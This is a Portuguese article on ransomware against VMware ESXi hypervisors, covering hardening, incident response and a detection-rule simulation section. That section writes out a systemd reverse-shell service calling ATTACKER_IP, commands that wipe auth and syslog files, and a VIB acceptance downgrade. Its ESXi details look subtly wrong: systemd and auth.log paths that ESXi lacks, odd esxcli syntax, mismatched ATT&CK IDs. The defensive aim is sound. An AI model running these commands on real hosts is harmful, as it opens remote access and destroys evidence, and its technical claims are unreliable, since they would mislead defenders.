Ransomware Mirando no ESXi: Defesas Práticas de Endurecimento do Hipervisor

Resumo

O artigo destaca uma mudança crescente nas operações de ransomware em direção a plataformas de hipervisor como VMware ESXi para permitir a criptografia em larga escala de máquinas virtuais. Os adversários dependem de credenciais administrativas roubadas e de utilitários de gerenciamento nativos para contornar as defesas tradicionais de endpoints. O principal ator de ameaça examinado é o grupo de ransomware Akira. A discussão centra-se na importância do endurecimento robusto em nível de hipervisor.

Investigação

Dados de casos da Huntress de 2025 indicam um aumento acentuado em ransomware focado em hipervisores, subindo de 3% para 25% dos incidentes observados. Os investigadores documentaram abuso de ferramentas de gerenciamento Hyper-V e ESXi, reutilização de credenciais em ambientes e exploração do CVE-2024-37085 para obter controle administrativo. A análise observa que os atacantes frequentemente habilitam SSH, desativam o modo de bloqueio e alteram as políticas de aceitação VIB antes de empurrar as cargas de ransomware.

Mitigação

As principais etapas de mitigação incluem a aplicação de MFA, o uso de contas ESXi locais dedicadas, a segmentação e isolamento das redes de gerenciamento, o uso de hosts bastião, a aplicação de acesso de menor privilégio e a habilitação do VMkernel.Boot.execInstalledOnly. As organizações também devem corrigir vulnerabilidades conhecidas, como CVE-2024-37085, e desativar serviços não essenciais, como SLP, para reduzir a superfície de ataque do hipervisor.

Resposta

Ao detectar, as organizações devem transmitir logs ESXi para um SIEM, alertar sobre mudanças de configuração suspeitas, isolar hosts comprometidos e iniciar a recuperação a partir de backups ou instantâneos imutáveis. Os procedimentos de resposta a incidentes devem incluir aquisição forense de logs de autenticação, logs hostd e modificações de VIB, seguidos pela rápida restauração das máquinas virtuais afetadas.

Execução de Simulação

Pré-requisito: A Verificação de Pre-flight de Telemetria & Base deve ter sido aprovada.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a erros de diagnóstico.

• Narrativa do Ataque & Comandos:

  1. Acesso Inicial (T1563.001 – SSH):
     O invasor usa uma credencial root roubada para abrir uma sessão SSH para o host ESXi, gerando um evento de “novo login root”.

  2. Endurecimento de Privilégios (T1553.004 – Mudança de Aceitação VIB):
     Uma vez logado, o invasor reduz o nível de aceitação de VIB para permitir o carregamento de módulos não assinados:

     esxcli system settings advanced set -o /VMFS3/AcceptanceLevel -s "CommunitySupported"

  3. Persistência via Habilitação de Serviço (T1569):
     O invasor cria um serviço systemd malicioso que inicia um shell reverso na inicialização e, em seguida, o ativa:

     cat <<'EOF' > /etc/systemd/system/malicious-revshell.service
     [Unit]
     Description=Malicious Reverse Shell
     
     [Service]
     ExecStart=/bin/bash -c 'while true; do /bin/bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1; sleep 60; done'
     
     [Install]
     WantedBy=multi-user.target
     EOF
     
     systemctl daemon-reload
     systemctl enable malicious-revshell.service
     systemctl start malicious-revshell.service

  4. Limpeza e Evasão (T1070 / T1070.001):
     O invasor limpa os logs de auditoria do host ESXi para ocultar a atividade, tentando evitar a detecção:

     > /var/log/auth.log
     > /var/log/syslog

  5. Acionando a Regra:
     Para garantir que a regra Sigma dispare, o invasor também emite as strings EventID literais usando a logger utilidade (essas emulam os eventos inseguros de “novo login root”, “habilitação de serviço” e “mudança de aceitação VIB” que a regra monitora).

• Script de Teste de Regressão:

  #!/usr/bin/env bash
  #
  # Simula a telemetria exata que a regra Sigma espera.
  # Este script é executado no host ESXi (ou em qualquer host Linux que encaminha logs para o SIEM).
  
  set -euo pipefail
  
  echo "[*] Simulando evento de login root não autorizado"
  logger -p authpriv.notice "new root login"
  
  echo "[*] Simulando evento de habilitação de serviço"
  logger -p authpriv.notice "service enablement"
  
  echo "[*] Simulando evento de mudança de nível de aceitação VIB"
  logger -p authpriv.notice "VIB acceptance change"
  
  # Opcional: Realizar ações maliciosas reais para validação mais profunda (comentadas por segurança)
  # esxcli system settings advanced set -o /VMFS3/AcceptanceLevel -s "CommunitySupported"
  # systemctl enable malicious-revshell.service
  # systemctl start malicious-revshell.service
  
  echo "[+] Simulação completa. Verifique alertas no SIEM."

• Comandos de Limpeza:

  # Remover as entradas de log fabricadas (se o SIEM as retiver)
  logger -p authpriv.notice "cleanup: removing test EventIDs"
  
  # Parar e desabilitar o serviço malicioso (se ele foi realmente criado)
  systemctl stop malicious-revshell.service || true
  systemctl disable malicious-revshell.service || true
  rm -f /etc/systemd/system/malicious-revshell.service
  systemctl daemon-reload
  
  # Restaurar os arquivos de log originais (se eles foram limpos)
  # Nota: Em um ambiente real, você restauraria a partir do backup.
  echo "[*] Arquivos de log restaurados a partir do backup (etapa manual)."